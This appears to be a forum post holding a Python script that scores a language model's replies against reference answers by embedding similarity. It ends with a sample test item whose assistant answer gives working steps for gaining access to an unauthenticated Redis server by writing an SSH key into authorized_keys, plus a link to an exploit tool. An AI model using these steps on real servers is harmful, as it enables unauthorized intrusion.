import os
import json
import torch
from tqdm import tqdm
from transformers import AutoTokenizer, AutoModelForCausalLM
from sentence_transformers import SentenceTransformer, util
class DialogueEvaluator:
def __init__(self,
test_data_path: str,
embed_model_path: str = "shibing624/text2vec-base-chinese",
gen_model_path: str = None,
similarity_threshold: float = 0.75,
device: str = "cuda" if torch.cuda.is_available() else "cpu"):
"""
初始化对话评估器
参数:
test_data_path: 测试数据集路径(JSON格式)
embed_model_path: 文本嵌入模型路径
gen_model_path: 生成模型路径(可选)
similarity_threshold: 语义相似度阈值
device: 计算设备(cuda/cpu)
"""
self.device = device
self.similarity_threshold = similarity_threshold
# 加载测试数据
with open(test_data_path, 'r', encoding='utf-8') as f:
self.test_data = json.load(f)
# 加载文本嵌入模型
print("加载文本嵌入模型...")
self.embed_model = SentenceTransformer(
embed_model_path, device=self.device
)
# 初始化生成模型状态
self.gen_model_loaded = False
self.gen_tokenizer = None
self.gen_model = None
# 尝试加载生成模型
if gen_model_path and os.path.exists(gen_model_path):
print(f"尝试加载生成模型: {gen_model_path}...")
try:
self.gen_tokenizer = AutoTokenizer.from_pretrained(
gen_model_path,
trust_remote_code=True,
local_files_only=True
)
self.gen_model = AutoModelForCausalLM.from_pretrained(
gen_model_path,
device_map="auto",
torch_dtype=torch.float16 if device=="cuda" else torch.float32,
trust_remote_code=True,
local_files_only=True
).eval()
self.gen_model_loaded = True
print("✅ 生成模型加载成功")
except Exception as e:
print(f"❌ 生成模型加载失败: {str(e)}")
def get_embedding(self, text: str) -> torch.Tensor:
"""获取文本的嵌入向量"""
return self.embed_model.encode(text, convert_to_tensor=True)
def generate_response(self, prompt: str) -> str:
"""使用生成模型生成回复"""
if not self.gen_model_loaded:
return "[未加载模型]"
inputs = self.gen_tokenizer(
prompt,
return_tensors="pt"
).to(self.device)
outputs = self.gen_model.generate(
**inputs,
max_new_tokens=256,
temperature=0.7,
top_p=0.9,
do_sample=True
)
return self.gen_tokenizer.decode(
outputs[0],
skip_special_tokens=True
).replace(prompt, "")
def evaluate_pair(self, text1: str, text2: str) -> dict:
"""
评估文本对相似度
返回:
{
"text1": str,
"text2": str,
"similarity": float,
"is_correct": bool,
"match_type": str
}
"""
# 完全匹配检测
if text1.strip() == text2.strip():
return {
"text1": text1,
"text2": text2,
"similarity": 1.0,
"is_correct": True,
"match_type": "exact"
}
# 语义相似度计算
emb1 = self.get_embedding(text1[:512])
emb2 = self.get_embedding(text2[:512])
# 计算余弦相似度: $ \text{similarity} = \cos(\theta) = \frac{\vec{A} \cdot \vec{B}}{\|\vec{A}\| \times \|\vec{B}\|} $
similarity = util.pytorch_cos_sim(
emb1.unsqueeze(0),
emb2.unsqueeze(0)
).item()
return {
"text1": text1,
"text2": text2,
"similarity": similarity,
"is_correct": similarity >= self.similarity_threshold,
"match_type": "semantic"
}
def evaluate(self, output_path: str = "evaluation_results.json"):
"""执行完整评估流程"""
results = []
total_correct = 0
for sample in tqdm(self.test_data, desc="评估进度"):
prompt = sample["instruction"]
reference = sample["reference"]
# 生成回复
try:
generated = self.generate_response(prompt)
except Exception as e:
print(f"⚠️ 生成失败: {str(e)}")
generated = "[生成失败]"
# 评估生成的回复
eval_result = self.evaluate_pair(reference, generated)
# 统计结果
if eval_result["is_correct"]:
total_correct += 1
results.append({
"instruction": prompt,
"reference": reference,
"generated": generated,
**eval_result
})
# 计算准确率
accuracy = total_correct / len(results)
summary = {
"total_samples": len(results),
"accuracy": accuracy,
"correct_count": total_correct,
"similarity_threshold": self.similarity_threshold,
"gen_model_loaded": self.gen_model_loaded
}
# 保存结果
final_results = {
"summary": summary,
"details": results
}
with open(output_path, 'w', encoding='utf-8') as f:
json.dump(final_results, f, ensure_ascii=False, indent=2)
print(f"\n✅ 评估完成! 准确率: {accuracy:.2%}")
print(f"📊 结果已保存至: {output_path}")
return final_results
# =============== 使用示例 ===============
if __name__ == "__main__":
# 初始化评估器
evaluator = DialogueEvaluator(
test_data_path="test_data.json", # 包含{instruction, reference}的测试数据
gen_model_path="path/to/generation_model",# 可选生成模型路径
embed_model_path="text_embedding_model", # 文本嵌入模型
similarity_threshold=0.75 # 相似度阈值
)
# 执行评估
results = evaluator.evaluate(output_path="eval_results.json")
# 打印摘要
print("\n评估摘要:")
print(json.dumps(results["summary"], indent=2))
测试集格式为:
{
"conversations": [
{
"from": "user",
"value": "如何通过SSH密钥注入获取Redis服务器访问权限?"
},
{
"from": "assistant",
"value": "前提条件:目标Redis实例允许匿名访问,已知Web目录路径为/var/www/html\n\n分步SSH密钥注入方法:\n\n1. **生成SSH密钥对**:\n```bash\nssh-keygen -t rsa -f redis_key\n```\n2. **格式化公钥并上传**:\n```bash\n(echo -e \"\\n\\n\"; cat redis_key.pub; echo -e \"\\n\\n\") | redis-cli -h 10.10.10.10 -x set ssh_key\n```\n3. **配置Redis存储路径**:\n```redis\nCONFIG SET dir /home/redis/.ssh\nCONFIG SET dbfilename \"authorized_keys\"\nSAVE\n```\n4. **SSH连接验证**:\n```bash\nssh -i redis_key redis@10.10.10.10\n```\n自动化工具推荐:https://github.com/Avinash-acid/Redis-Server-Exploit"
}
]
}
修改一下代码
最新发布